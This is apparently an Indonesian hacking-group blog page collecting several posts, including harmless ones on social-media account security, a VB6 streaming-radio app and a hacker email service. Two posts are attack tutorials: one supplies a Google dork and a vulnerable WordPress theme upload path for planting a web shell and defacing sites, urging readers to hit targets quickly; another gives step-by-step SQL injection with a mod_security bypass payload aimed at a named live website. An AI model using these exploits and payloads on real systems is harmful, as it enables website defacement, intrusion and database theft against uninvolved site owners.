Cara Deface Dengan Exploit WP Themes Salespresspro

Cara Deface Dengan Exploit WP Themes Salespresspro

Kali ini saya akan membagikan tutorial "Cara Deface Dengan Exploit WP Themes Salespresspro" yang baru saja saya baca di blognya Java-Cyber. Barusan saya terapin masih dapat banyak kok jadi buruan dah hajar sebelum kehabisan hahaha :D

• Dork : inurl:wp-content/salespresspro
• Exploit : /wp-content/themes/salespresspro/headerimgbgblog-upload.php

1. Silahkan cari target dulu ke google, lalu buka salah satu website dan ubah urlnya jadi seperti ini :

 www.bimo-notes.org/wp-content/themes/salespresspro/headerimgbgblog-upload.php

2. Silahkan upload langsung shell kalian ( Browse -> shell.php -> upload file )

 3. Setelah itu, nanti dibagian "Your Uploaded Images" muncul gambar rusak, silahan open new tab / copy link gambar rusak tersebut lalu buka.

Nah setelah berhasil upload shell, sekarng terserah mau diapain.
Kalau mau ditebas Indexnya silahkan back up dolo ya bro :) Untuk simple patchnya silahkan rename file headerimgbgblog-upload.php menjadi headerimgbgblog-upload.txt.

Sekian tutorial dari saya jika ada yang kurang jelas silahkan tanyakan, thanks to Java-Cyber.

Author : BIMO SEPTIAWAN

Add to Cart View detail

Tips Mengamankan Akun Sosial Media

Tips Mengamankan Akun Sosial Media

Assallamuallaikum sobat IDCA, saya buat artikel ini karena masih banyak pengguna sosial media khususnya Facebook dan Twitter yang resah karena akunnya di hack oleh orang lain.Nah untuk meminimalisir akun anda di hack oleh orang lain silahkan baca artikel ini sampai habis kwkwkw saya akan jelaskan metodenya selakian.

• Ikuti aturan yang berlaku pada website sosial media

Nah mungkin masih banyak pengguna sosial media yang masih enggan mematuhi peraturan yang sudah dibuat oleh webmasternya, padahal dengan mengikuti aturan itu akun anda akan sulit diambil alih orang lain. Untuk akun facebook sendiri silahkan vertifikasi akun anda dengan nomer HP jika belum tau caranya silahkan kesini.

• Gunakan password yang tidak pasaran

Mungkin sekarang masih banyak user yang masih menggunakan password yang mudah seperti tanggal lahir, nama belakang, band kesukaan atau semacamnya. Jika begitu sekarang silahkan ganti password kalian karena jika tidak akun anda rawan terkena serangan brute force. Untuk artikel brute force silahkan baca disini. Gunakanlah password dengan kombinasi angka jika perlu simbol agar password anda tidak mudah ditebak.

• Hati-hati dengan website auto like / auto followers

Nah masih banyak kan kalian disini yang masih sering menggunakan jasa pihak ketiga untuk menambahkan Like atau followers ?  saya sarankan setelah kalian memakai aplikasi tersebut silahkan langsung hapus aplikasinya caranya :

Untuk facebook pergi kesini
Untuk twitter pergi kesini

Lalu pilih hapus aplikasi yang barusan kalian gunakan, jika tidak dihapus mungkin iya akun kalian tidak di hack namun akun kalian bisa di gunakan oleh orang lain semisal mengirim kiriman ke seluruh grup, dan semacamnya

• Phising Website

Walaupun trik ini sudah tergolong lama sebaikya tetap hati-hati karena masih banyak orang-orang iseng memakai trik ini. Phising website ini bisa sukses jika kalian tidak bisa membedakan apakah website yang kalian kunjungi phising atau bukan. Nah jika belum silahkan kalian baca artikel disini

• Aplikasi Hack Facebook / Twitter ber Keylogger

Pernah lihat aplikasi semacam itu ? ya buang jauh jauh pikiran kalian untuk berhasil membajak akun seseorang, bukannya Untung kalian akan buntung. Dengan aplikasi itu kalian sama saja memberikan username dan password kalian. Kalian bisa lihat aplikasi diatas mengharuskan anda login terlebih dahulu bukan ? nah jika anda login disitu maka otomatis data kalian langsung masuk ke database web author aplikasi tersebut. Aplikasi semacam ini pernah dibahas oleh teman saya di forum #JKT48CYBERTEAM jika ingin melihat silahkan kesini

Mungkin itu dulu ulasan yang bisa saya bahas, jika ada tambahan silahkan tulis di komentar nanti akan saya muat. Trimakasih.

Author : Bimo Septiawan



Add to Cart View detail

Cara Daftar Email Hacker

Cara Daftar Email Hacker

Assalamualaikum.... Kebetulan domain name untuk mail IDCA udah ditambahain dengan yg baru. bagi yang belu tau silahkan daftar aja, gratis kok :) sekalipun ga dipake, tapi yah lumayanlah bisa buat gaya-gayaan :D asal gaya2nya jgn lebay, biar ga terlihat menjijikkan.. sip :D

Step 1 : Silahkan register disini

Step 2 : Isi form dengan benar seperti alamat email, password dan capcha.

Step 3 : Klik Sign Up dan Selesai :)

Cuma begitu aja mah, semoga email ini bisa dimanfaatkan dengan sebaik2nya yah :D salam...


Author : Onix AQua

Add to Cart View detail

Membuat Aplikasi Radio Streaming dengan VB 6.0

Membuat Aplikasi Radio Streaming dengan VB 6.0

Assallamuallaikum sobat IDCA :D
Nih ane mau bagi-bagi tutorial cara membuat Aplikasi Radio streaming, tutorial ini sendiri saya dapat dari mbah google dan beberapa teman saya yang ngebimbing ^_^

Okay langsung saja sebelumnya silahkan download bahannya disini.


1. Buka Microsoft Visual Basic 6.0 yang sudah kalian download tadi.

2. Kelik CTRL + T lalu cari component Windows Media Player dan klik Apply

3. Sekarang klik Icon Windows Media Playernya lalu buat ke formnya 

Pada properti Windows Media Player , silahkan isi URL Radio Streaming kalian.

5. Nah sebenarnya itu saja udah jadi, tapi biar tidak terlalu monoton bisa kalian kreasikan sesuka hati anda. Disini cuma saya sisipkan gambar aja .

6. Nanti tampilan akan seperti ini

7. Jika sudah sekarang tinggal buat menjadi file.exe aja

Sekian dulu tutorial yang bisa saya berikan, untuk tampilan bisa kalian edit sesuka hati. Ini contoh aplikasi yang saya buat :

Terimakasih buat Agam dan fikri yang sudah ngebimbing saya soal VB 6.0, untuk tutorial mempercantik tampilannya akan saya share kapan-kapan ya 

Author : Bimo Septiawan

Add to Cart View detail

[Tutorial] Bypass WAF (Mod_Security)

[Tutorial] Bypass WAF (Mod_Security)

Assalamuallaikum sobat IDCA.
Setelah sekian lama engak ngepost masalah deface, nih kita mulai singgung lagi :D

Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) , nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :

1. Contoh target

http://www.harshstones.com/product-detail.php?id=35

2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "

http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal 

http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error

Berarti jumlah table databasenya adalah 12

3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya

http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--

 

4. Sekarang kita bypass dengan perintah :

/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

5. Sekarang kita coba dengan site diatas :

http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--

 

Nah sekian artikel yang bisa saya sampaikan, tutorial ini ditulis oleh AtzShahab di forum kami.

Jika ada kendala silahkan kunjungi link disini

Author : AtzShahab

Rew-Post by Bimo Septiawan

Add to Cart View detail

Website Auto Follow Twitter IDCA

Website Auto Follow Twitter IDCA

Selamat datang di blog kami, kesempatan kali ini saya akan membagikan website auto follow yang baru saja saya buda. Nah mungkin ada dari teman-teman yang followernya masih sedikit ? silahkan pakai ini aja bro :D

Langsung saja :

1. Pergi ke website auto follower disini

2. Silahkan klik Sign with Twitter [ Disana menggunakan api twitter, jadi murni bukan web phising ]

3. Klik saja Authorize app, nanti akan ke redirect ke web kami.

4. Jika sudah redirect silahkan pilih menu salah satu [ Follower, AutoRetweet, AutoFav ]

5. Jika sudah tinggal tunggu saja, nanti follower akan kekirim ke twitter sobat :)

Semakin banyak member yang menggunakan follower ini, semakin banyak pula follower yang anda dapatkan. Jika follower yang didapat terhitung sedikit, anda bisa membeli follower secara instan :)

Follow pengembang : @Biimo_ID

Author : Bimo Septiawan

Add to Cart View detail

Mail IDCA [ @idca.or.id ]

Mail IDCA [ @idca.or.id ]

Assalamualaikum...

Karena banyak permintaan dari sobat2 semua yang mau menggunakan mail idca, maka saya berusaha membuat fasilitas ini agar bisa digunakan sebaik2nya untuk kepentingan bersama. Nah, setelah sekian lama menunggu, akhirnya selesai juga diuwik2 :D untuk fitur2nya masih sama seperti mail service yg lain. dan idca mail memiliki 2 domain alias yang terintegrasi didalmnya.

1. @idca.or.id
2. @indonesiancyberarmy.com
3. @idhacker.net
4. @elitehackermail.tk
5. @hacker-mail.tk

dan untuk domain lainnya bakal menyusul lain waktu,, (ngumpulin duit dulu :ngakak: ) lalu untuk proses registrasi sbb:

Step 1 : buka webmail IDCA lalu klik Register

Step 2 : isi formulir dengan benar, seperti pilihan domain alias, username, password, dan capcha.. lalu klik Sign Up.

Step 3 : selesai, tinggal login dan selamat menikmati :D

Proses registrasinya ga susah kan? :D yah cuma gitu aja,, :ngakak:

LINK REGISTRASI

Sumber: http://forum.idca.or.id/showthread.php?tid=1970

Author : Onix AQua

Posted by Bimo Septiawan

Add to Cart View detail